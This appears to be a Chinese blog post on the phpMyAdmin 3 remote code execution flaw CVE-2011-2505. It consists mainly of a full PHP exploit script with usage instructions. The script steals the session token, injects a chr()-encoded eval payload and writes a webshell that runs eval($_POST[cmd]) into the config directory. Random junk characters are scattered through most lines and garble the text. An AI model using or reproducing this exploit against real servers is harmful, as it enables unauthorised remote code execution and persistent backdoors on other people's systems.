最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。7 { W V1 B4 G: D) s' I& e: P
8 g/ F! T( D% T5 T% n- k# s w' k
昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。3 g7 V9 [: \2 j5 W) h, g! u
! w- Z0 j/ [$ Z* E) k
首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:5 Y( j5 F) ?8 ~/ s& m* O
一是session.auto_start = 1;
& n' a0 F1 [- ?8 [4 b! Y二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
$ s5 s) r7 k8 F当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。
/ T% a7 m2 \$ E1 N) P O3 f" [ r+ Z) h; y2 K; R0 _* B9 J$ r
在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。
# M2 D5 O( H# }4 `3 j1 E
7 ~7 z5 a( `- D1 z于是写了这个php版本的exp,代码如下:
, h1 G7 u: l( i0 m/ \: R8 p. S! z4 b. l9 J
#!/usr/bin/php7 u" ^; q( Y2 U# m
<?php
8 ^" U8 F' T: ?4 R) {- y. k, @print_r('
; t. Z& E4 X3 w }( I2 @7 |+---------------------------------------------------------------------------+
% l% d2 v9 z2 u- wpma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]& [8 c! x3 |$ l7 k- }# \
by oldjun(www.oldjun.com)
/ q7 a: E' x2 \8 vwelcome to www.t00ls.net
: ]% j; A/ a; q0 x) pmail: oldjun@gmail.com" Q6 f4 T' B* ~7 V/ B# |& G
Assigned CVE id: CVE-2011-2505# D* u; q1 W* T! ?0 h' Y6 p
+---------------------------------------------------------------------------+
: K8 E3 G- A: b @( X. \, U');
' z% r$ f$ F# f- b; t7 y
6 n9 |8 a9 l: Q, v/**
- u# f0 u: y6 D: U( D * working when the directory:"config" exists and is writeable.
4 K2 X! f9 f9 y! [ L**/- O: [; v8 l& `# P
" v6 u) T6 B/ B" g0 o3 S6 L
if ($argc < 3) {: A0 b8 E- [" P1 |
print_r(', b" O+ i& s( N5 f; Q( _
+---------------------------------------------------------------------------+
5 B6 }( J7 W: k! Z* Z9 pUsage: php '.$argv[0].' host path0 q' j; U! I0 p9 _2 K, v# I7 J
host: target server (ip/hostname)
8 o0 \$ L0 ]5 X) V' vpath: path to pma3
0 R6 m5 C9 F* E E6 F. N% | {Example:" [; |8 {4 Y% s f" G
php '.$argv[0].' localhost /pma/8 C4 g8 b5 u' k# ~
+---------------------------------------------------------------------------+
2 c4 H, H( e5 ~) q+ o" x4 g');8 a9 q; i/ h9 g; j* P
exit;3 Q- w% r# u% `, d% H) {
}
+ _' `# g# O( H& @' s4 s# J
" t; C8 I9 d+ l3 q7 f0 c' D5 V$host = $argv[1];0 Z( W) L/ H- J1 f% v, _
$path = $argv[2];
. ]3 C+ i, d R
& }7 X' w& P N6 y' m/**
- s' o; Q/ e: g * Try to determine if the directory:"config" exists
. h. a& Z9 {) R) D9 V4 V**/+ H- J, i$ {$ h" {
echo "[+] Try to determine if the directory:config exists....\n";
2 @) ~1 R/ s' z1 c% r b$returnstr=php_request('config/');
1 \) q5 g2 o! _. S% Kif(strpos($returnstr,'404')){# c) {& n2 x$ B; U
exit("[-] Exploit Failed! The directory:config do not exists!\n"); r8 H: ~1 o* R% E: s, l& W
}4 P8 c7 r7 w" Y
+ V- z+ ]2 p* d
/**
: }1 i) s. S: J/ F+ U# t% h/ s$ \ * Try to get token and sessionid) b( t8 k- J$ s9 K. n. p% Y
**/
* T; ^4 M8 x! ?7 W9 `echo "[+] Try to get token and sessionid....\n";( k) X; ~9 M$ n
$result=php_request('index.php');
' j8 r* m: D1 N' Y. m' ipreg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
+ ~) z/ ?" a. q a5 ~8 L$token=$resp[3];6 \ Z# _) u; h$ O
$sessionid=$resp[1];
/ A, {9 [! {) q, iif($token && $sessionid){+ ?5 e7 L! j% L7 T7 M
echo "[+] token token\n";7 r ]1 S( C+ b4 @+ ^6 z
echo "[+] Session ID sessionid\n";, r- C7 i2 z* J& C" Q7 T) H1 y
}else{
' K1 f7 O1 Q7 f exit("[-] Can't get token and Session ID,Exploit Failed!\n");3 x5 Z- p5 \- ~* ~3 U
}6 D" k# s7 ^6 u/ E
' h4 S+ y" N$ y# P/ i/**/ s2 S( }5 Q" Z
* Try to insert shell into session
6 y; m9 j# _0 o: G**/
2 k1 M8 C# |" L$ uecho "[+] Try to insert shell into session....\n";
+ @; P! `" w( K, fphp_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.' g3 u6 e2 {1 [( Y7 S4 v. R% `* i" m
/ Q5 r0 d5 E/ `7 D
/**
' X1 ^/ r; h4 c c$ l * Try to create webshell
5 ^$ i7 p; B! z! T**/# \; |0 ^; @ @& [
echo "[+] Try to create webshell....\n";
! @% d( f% M( \1 h5 O5 E4 cphp_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
5 @6 o3 a8 F2 u, h, h! I8 R/**1 e5 g# ?- s: p7 m# X
* Try to check if the webshell was created successfully
! `! y, {4 _& K1 _**/& ~4 ~! P9 q; d
echo "[+] Try to check if the webshell was created successfully....\n";" C6 l& A8 C$ U% r) l# O
$content=php_request('config/config.inc.php');
" U' g& b5 ^% M# iif(strpos($content,'t00ls')){# f' S3 K9 n5 @( U0 j3 ?* `* `
echo "[+] Congratulations! Expoilt successfully....\n";
: A# s+ Y8 Z; Y: c w: {% Q# ~ echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";+ ]) O% |" [$ s5 g
}else{9 x$ A; }3 \& X8 A8 j) H
exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");# ]$ y+ {9 E* Y, a* C) M
}5 k6 H0 M& S# ^
9 a2 c# k* F7 F1 U3 I% S
function php_request($url,$data='',$cookie=''){4 o* J1 z* u; b" p
global $host, $path;
7 R7 Z+ h) f" q( ~ : P% C0 @2 q) Y1 }
$method=$data?'POST':'GET';
, H: R; S; V# H5 x$ Q( }1 ~9 v3 l ) z* y7 S6 J- O @& o5 h5 [ A0 j
$packet = $method." ".$path.$url." HTTP/1.1\r\n";
0 \! u) K `1 f& M, \+ m' | $packet .= "Accept: */*\r\n";
2 g5 f+ l4 s' e, M& e $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
3 B2 i3 I8 S' l. X- l, Q' A1 S: G $packet .= "Host: $host\r\n";+ {9 \; j- J# W {# I
$packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";/ y7 w4 E% g n6 a( h, U m2 @4 v
$packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
; f8 I; w+ x5 Y: Y $packet .= $cookie?"Cookie: $cookie\r\n":"";0 d z& e3 X+ o7 ?+ \
$packet .= "Connection: Close\r\n\r\n";! X# Y& O3 y& D6 A. }
$packet .= $data?$data:"";
) {* [3 [% u1 H) x1 `' {' u: p" r2 _- _1 O F5 ?
$fp = fsockopen(gethostbyname($host), 80);
( ^: p- }, ~; e if (!$fp) {6 q9 E8 [# V5 |
echo 'No response from '.$host; die;
) A) Z! J2 [1 Q& ^9 i5 V% Q& a }* z* k2 v, N7 Y6 B
fputs($fp, $packet);6 g- i1 G- w3 L9 @- U4 C! N4 b2 V6 h
' V; ~( X" w: }1 ]4 ~ t: F $resp = '';: _' u" I# H& q3 R! f
+ b% ^2 \$ n: U7 X; o: @; q while ($fp && !feof($fp))
, [% E& ~' f) R D7 Q5 \ $resp .= fread($fp, 1024);
, ^ x2 y3 }. h8 F
4 ?1 h0 |1 V n; u return $resp;9 l6 H( ]; n# U# g. B) Q% ^: @
}* w3 X s' i- y/ p8 t7 x
3 N% x. c9 C0 Z$ [% n% g2 k
?> 8 i4 f( o V1 {4 R3 |3 c# b) A
. |